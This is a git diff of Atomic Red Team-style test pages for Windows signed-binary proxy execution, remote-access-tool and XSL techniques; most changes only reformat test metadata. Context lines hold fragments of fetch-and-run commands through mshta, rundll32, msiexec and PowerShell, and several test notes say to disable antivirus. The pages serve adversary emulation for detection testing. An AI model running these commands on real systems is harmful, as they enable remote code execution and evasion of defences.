## Atomic Test #5 - Invoke CHM Simulate Double click - -auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a - Executes a CHM file simulating a user double click. + **Supported Platforms:** Windows +**auto_generated_guid:** 5decef42-92b8-4a93-9eb2-877ddcb9401a + + + #### Inputs:
@@ -239,13 +249,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #6 - Invoke CHM with Script Engine and Help Topic - -auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5 - Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension. + **Supported Platforms:** Windows +**auto_generated_guid:** 4f83adda-f5ec-406d-b318-9773c9ca92e5 + + + #### Inputs:
@@ -288,13 +300,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic - -auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247 - Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension. + **Supported Platforms:** Windows +**auto_generated_guid:** 15756147-7470-4a83-87fb-bb5662526247 + + + #### Inputs:
diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md
index 831bf542..95b2ed09 100644
--- a/atomics/T1218.002/T1218.002.md
+++ b/atomics/T1218.002/T1218.002.md
@@ -16,14 +16,16 @@ Adversaries may also rename malicious DLL files (.dll) with Control Panel file e
## Atomic Test #1 - Control Panel Items - -auto_generated_guid: 037e9d8a-9e46-4255-8b33-2ae3b545ca6f - This test simulates an adversary leveraging control.exe Upon execution calc.exe will be launched + **Supported Platforms:** Windows +**auto_generated_guid:** 037e9d8a-9e46-4255-8b33-2ae3b545ca6f + + + #### Inputs:
diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md
index 4cd4cfd9..57adcbec 100644
--- a/atomics/T1218.003/T1218.003.md
+++ b/atomics/T1218.003/T1218.003.md
@@ -16,13 +16,15 @@ CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mit
## Atomic Test #1 - CMSTP Executing Remote Scriptlet - -auto_generated_guid: 34e63321-9683-496b-bbc1-7566bc55e624 - Adversaries may supply CMSTP.exe with INF files infected with malicious commands + **Supported Platforms:** Windows +**auto_generated_guid:** 34e63321-9683-496b-bbc1-7566bc55e624 + + + #### Inputs:
@@ -60,13 +62,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - CMSTP Executing UAC Bypass - -auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 - Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file + **Supported Platforms:** Windows +**auto_generated_guid:** 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 + + + #### Inputs:
diff --git a/atomics/T1218.004/T1218.004.md b/atomics/T1218.004/T1218.004.md
index d30c0256..52a9a6bb 100644
--- a/atomics/T1218.004/T1218.004.md
+++ b/atomics/T1218.004/T1218.004.md
@@ -26,14 +26,16 @@ InstallUtil may also be used to bypass application control through use of attrib
## Atomic Test #1 - CheckIfInstallable method call - -auto_generated_guid: ffd9c807-d402-47d2-879d-f915cf2a3a94 - Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed. If no output is displayed the test executed successfuly. + **Supported Platforms:** Windows +**auto_generated_guid:** ffd9c807-d402-47d2-879d-f915cf2a3a94 + + + #### Inputs:
@@ -104,14 +106,16 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - InstallHelper method call - -auto_generated_guid: d43a5bde-ae28-4c55-a850-3f4c80573503 - Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test executed successfuly. + **Supported Platforms:** Windows +**auto_generated_guid:** d43a5bde-ae28-4c55-a850-3f4c80573503 + + + #### Inputs:
@@ -184,13 +188,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - InstallUtil class constructor method call - -auto_generated_guid: 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 - Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 + + + #### Inputs:
@@ -263,13 +269,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InstallUtil Install method call - -auto_generated_guid: 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b - Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b + + + #### Inputs:
@@ -342,13 +350,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - InstallUtil Uninstall method call - /U variant - -auto_generated_guid: 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b - Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b + + + #### Inputs:
@@ -421,13 +431,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant - -auto_generated_guid: 06d9deba-f732-48a8-af8e-bdd6e4d98c1d - Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 06d9deba-f732-48a8-af8e-bdd6e4d98c1d + + + #### Inputs:
@@ -500,13 +512,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - InstallUtil HelpText method call - -auto_generated_guid: 5a683850-1145-4326-a0e5-e91ced3c6022 - Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. + **Supported Platforms:** Windows +**auto_generated_guid:** 5a683850-1145-4326-a0e5-e91ced3c6022 + + + #### Inputs:
@@ -579,14 +593,16 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #8 - InstallUtil evasive invocation - -auto_generated_guid: 559e6d06-bb42-4307-bff7-3b95a8254bad - Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation." will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion. + **Supported Platforms:** Windows +**auto_generated_guid:** 559e6d06-bb42-4307-bff7-3b95a8254bad + + + #### Inputs:
diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md
index 420c1301..8682f1e1 100644
--- a/atomics/T1218.005/T1218.005.md
+++ b/atomics/T1218.005/T1218.005.md
@@ -34,13 +34,15 @@ Mshta.exe can be used to bypass application control solutions that do not accoun
## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject - -auto_generated_guid: 1483fab9-4f52-4217-a9ce-daa9d7747cae - Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 1483fab9-4f52-4217-a9ce-daa9d7747cae + + + #### Inputs:
@@ -65,15 +67,17 @@ mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
## Atomic Test #2 - Mshta executes VBScript to execute malicious command - -auto_generated_guid: 906865c3-e05f-4acc-85c4-fbc185455095 - Run a local VB script to run local user enumeration powershell command. This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. Upon execution, a new PowerShell windows will be opened that displays user information. + **Supported Platforms:** Windows +**auto_generated_guid:** 906865c3-e05f-4acc-85c4-fbc185455095 + + +
@@ -93,13 +97,15 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit
## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) - -auto_generated_guid: c4b97eeb-5249-4455-a607-59f95485cb45 - Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** c4b97eeb-5249-4455-a607-59f95485cb45 + + + #### Inputs:
@@ -131,13 +137,15 @@ remove-item "#{temp_file}" -ErrorAction Ignore
## Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement - -auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447 - Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement. + **Supported Platforms:** Windows +**auto_generated_guid:** 007e5672-2088-4853-a562-7490ddc19447 + + + #### Inputs:
@@ -178,13 +186,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click - -auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33 - Executes an HTA Application using JScript script engine simulating double click. + **Supported Platforms:** Windows +**auto_generated_guid:** 58a193ec-131b-404e-b1ca-b35cf0b18c33 + + + #### Inputs:
@@ -224,13 +234,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #6 - Invoke HTML Application - Direct download from URI - -auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db - Executes an HTA Application by directly downloading from remote URI. + **Supported Platforms:** Windows +**auto_generated_guid:** 39ceed55-f653-48ac-bd19-aceceaf525db + + + #### Inputs:
@@ -270,13 +282,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler - -auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af - Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. + **Supported Platforms:** Windows +**auto_generated_guid:** e7e3a525-7612-4d68-a5d3-c4649181b8af + + + #### Inputs:
@@ -317,13 +331,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler - -auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 - Executes an HTA Application with JScript Engine and Inline Protocol Handler. + **Supported Platforms:** Windows +**auto_generated_guid:** d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 + + + #### Inputs:
@@ -364,13 +380,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path - -auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362 - Executes an HTA Application with Simulate lateral movement over UNC Path. + **Supported Platforms:** Windows +**auto_generated_guid:** b8a8bdb2-7eae-490d-8251-d5e0295b2362 + + + #### Inputs:
diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md
index e6629801..6af04be4 100644
--- a/atomics/T1218.007/T1218.007.md
+++ b/atomics/T1218.007/T1218.007.md
@@ -16,13 +16,15 @@ Adversaries may abuse msiexec.exe to launch local or network accessible MSI file
## Atomic Test #1 - Msiexec.exe - Execute Local MSI file - -auto_generated_guid: 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 - Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 + + + #### Inputs:
@@ -59,13 +61,15 @@ Write-Host "You must provide your own MSI"
## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file - -auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 - Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** bde7d2fe-d049-458d-a362-abda32a7e649 + + + #### Inputs:
@@ -90,15 +94,17 @@ msiexec.exe /q /i "#{msi_payload}"
## Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL - -auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec - Execute arbitrary DLL file stored locally. Commonly seen in application installation. Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder. By default, if the src folder is not in place, it will download the 64 bit version. + **Supported Platforms:** Windows +**auto_generated_guid:** 66f64bd5-7c35-4c24-953a-04ca30a0a0ec + + + #### Inputs:
diff --git a/atomics/T1218.008/T1218.008.md b/atomics/T1218.008/T1218.008.md
index a05669ab..4f5b72e6 100644
--- a/atomics/T1218.008/T1218.008.md
+++ b/atomics/T1218.008/T1218.008.md
@@ -13,13 +13,15 @@ Adversaries may abuse odbcconf.exe to bypass application control solutions that
## Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL - -auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 - Execute arbitrary DLL file stored locally. + **Supported Platforms:** Windows +**auto_generated_guid:** 2430498b-06c0-4b92-a448-8ad263c388e2 + + + #### Inputs:
diff --git a/atomics/T1218.009/T1218.009.md b/atomics/T1218.009/T1218.009.md
index 14171284..d2b8d2e2 100644
--- a/atomics/T1218.009/T1218.009.md
+++ b/atomics/T1218.009/T1218.009.md
@@ -14,13 +14,15 @@ Both utilities may be used to bypass application control through use of attribut
## Atomic Test #1 - Regasm Uninstall Method Call Test - -auto_generated_guid: 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 - Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 + + + #### Inputs: @@ -64,14 +66,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvcs Uninstall Method Call Test - -auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 - Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed along with other information about the assembly being installed. + **Supported Platforms:** Windows +**auto_generated_guid:** fd3c1c6a-02d2-4b72-82d9-71c527abb126 + + + #### Inputs: diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md index e63f0519..b2a345a8 100644 --- a/atomics/T1218.010/T1218.010.md +++ b/atomics/T1218.010/T1218.010.md @@ -22,13 +22,15 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish pe
## Atomic Test #1 - Regsvr32 local COM scriptlet execution - -auto_generated_guid: 449aa403-6aba-47ce-8a37-247d21ef0306 - Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 449aa403-6aba-47ce-8a37-247d21ef0306 + + + #### Inputs: @@ -68,14 +70,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution - -auto_generated_guid: c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 - Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 + + + #### Inputs: @@ -102,13 +106,15 @@ windows defender real-time protection to fix it. Upon execution, calc.exe will b
## Atomic Test #3 - Regsvr32 local DLL execution - -auto_generated_guid: 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b - Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b + + + #### Inputs: @@ -148,13 +154,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Regsvr32 Registering Non DLL - -auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 - Replicating observed Gozi maldoc behavior registering a dll with an altered extension + **Supported Platforms:** Windows +**auto_generated_guid:** 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 + + + #### Inputs: @@ -197,13 +205,15 @@ copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer - -auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f - Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. + **Supported Platforms:** Windows +**auto_generated_guid:** 9d71c492-ea2e-4c08-af16-c6994cdf029f + + + #### Inputs: diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index 9af355b7..ce2c66cb 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -28,13 +28,15 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject - -auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be - Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be + + + #### Inputs: @@ -59,15 +61,17 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObj
## Atomic Test #2 - Rundll32 execute VBscript command - -auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb - Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched + **Supported Platforms:** Windows +**auto_generated_guid:** 638730e7-7aed-43dc-bf8c-8117f805f5bb + + + #### Inputs: @@ -92,15 +96,17 @@ rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.
## Atomic Test #3 - Rundll32 advpack.dll Execution - -auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 - Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution calc.exe will be launched + **Supported Platforms:** Windows +**auto_generated_guid:** d91cae26-7fc1-457b-a854-34c8aad48c89 + + + #### Inputs: @@ -138,16 +144,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Rundll32 ieadvpack.dll Execution - -auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 - Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution calc.exe will be launched Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 5e46a58e-cbf6-45ef-a289-ed7754603df9 + + + #### Inputs: @@ -185,15 +193,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - Rundll32 syssetup.dll Execution - -auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 - Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 41fa324a-3946-401e-bbdd-d7991c628125 + + + #### Inputs: @@ -231,15 +241,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - Rundll32 setupapi.dll Execution - -auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 - Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 71d771cd-d6b3-4f34-bc76-a63d47a10b19 + + + #### Inputs: @@ -277,18 +289,20 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll - -auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 - IcedID uses this TTP as follows: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" + **Supported Platforms:** Windows +**auto_generated_guid:** 22cfde89-befe-4e15-9753-47306b37a6e3 + + + @@ -309,13 +323,15 @@ rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteu
## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll - -auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 - Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. + **Supported Platforms:** Windows +**auto_generated_guid:** 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 + + + #### Inputs: diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index cc3c2998..49ffa97d 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -24,13 +24,15 @@
## Atomic Test #1 - mavinject - Inject DLL into running process - -auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61 - Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. + **Supported Platforms:** Windows +**auto_generated_guid:** c426dacf-575d-4937-8611-a148a86a5e61 + + + #### Inputs: @@ -69,13 +71,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code - -auto_generated_guid: d590097e-d402-44e2-ad72-2c6aa1ce78b1 - Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. + **Supported Platforms:** Windows +**auto_generated_guid:** d590097e-d402-44e2-ad72-2c6aa1ce78b1 + + + #### Inputs: @@ -100,13 +104,15 @@ SyncAppvPublishingServer.exe "n; #{powershell_code}"
## Atomic Test #3 - Register-CimProvider - Execute evil dll - -auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 - Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB + **Supported Platforms:** Windows +**auto_generated_guid:** ad2c17ed-f626-4061-b21e-b9804a6f3655 + + + #### Inputs: @@ -144,15 +150,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InfDefaultInstall.exe .inf Execution - -auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef - Test execution of a .inf using InfDefaultInstall.exe Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef + + + #### Inputs: @@ -190,13 +198,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File - -auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 - Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. + **Supported Platforms:** Windows +**auto_generated_guid:** db020456-125b-4c8b-a4a7-487df8afb5a2 + + + #### Inputs: @@ -234,13 +244,15 @@ write-host "Install Microsoft Word or provide correct path."
## Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution - -auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e - Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe + **Supported Platforms:** Windows +**auto_generated_guid:** 7cbb0f26-a4c1-4f77-b180-a009aa05637e + + + #### Inputs: @@ -279,13 +291,15 @@ write-host ".Net must be installed for this test to work correctly."
## Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions - -auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911 - Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe + **Supported Platforms:** Windows +**auto_generated_guid:** 4cc40fd7-87b8-4b16-b2d7-57534b86b911 + + + #### Inputs: @@ -326,9 +340,6 @@ write-host "you need to rename workflow complier before you run this test"
## Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test - -auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db - RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. @@ -338,9 +349,14 @@ Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 + **Supported Platforms:** Windows +**auto_generated_guid:** 9ebe7901-7edf-45c0-b5c7-8366300919db + + + #### Inputs: diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md index b22acd43..58c028d8 100644 --- a/atomics/T1219/T1219.md +++ b/atomics/T1219/T1219.md @@ -18,13 +18,15 @@ Admin tools such as TeamViewer have been used by several groups targeting instit
## Atomic Test #1 - TeamViewer Files Detected Test on Windows - -auto_generated_guid: 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 - An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 + + + @@ -54,13 +56,15 @@ Remove-Item $file1 -ErrorAction Ignore | Out-Null
## Atomic Test #2 - AnyDesk Files Detected Test on Windows - -auto_generated_guid: 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 - An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 + + + @@ -87,13 +91,15 @@ Remove-Item $file1 -ErrorAction Ignore
## Atomic Test #3 - LogMeIn Files Detected Test on Windows - -auto_generated_guid: d03683ec-aae0-42f9-9b4c-534780e0f8e1 - An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** d03683ec-aae0-42f9-9b4c-534780e0f8e1 + + + diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md index 43a4c44f..c88966ce 100644 --- a/atomics/T1220/T1220.md +++ b/atomics/T1220/T1220.md @@ -31,13 +31,15 @@ Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
## Atomic Test #1 - MSXSL Bypass using local files - -auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d - Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** ca23bfb2-023f-49c5-8802-e66997de462d + + + #### Inputs: @@ -86,13 +88,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - MSXSL Bypass using remote files - -auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 - Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 + + + #### Inputs: @@ -118,13 +122,15 @@ C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
## Atomic Test #3 - WMIC bypass using local XSL file - -auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 - Executes the code specified within a XSL script using a local payload. + **Supported Platforms:** Windows +**auto_generated_guid:** 1b237334-3e21-4a0c-8178-b8c996124988 + + + #### Inputs: @@ -163,13 +169,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
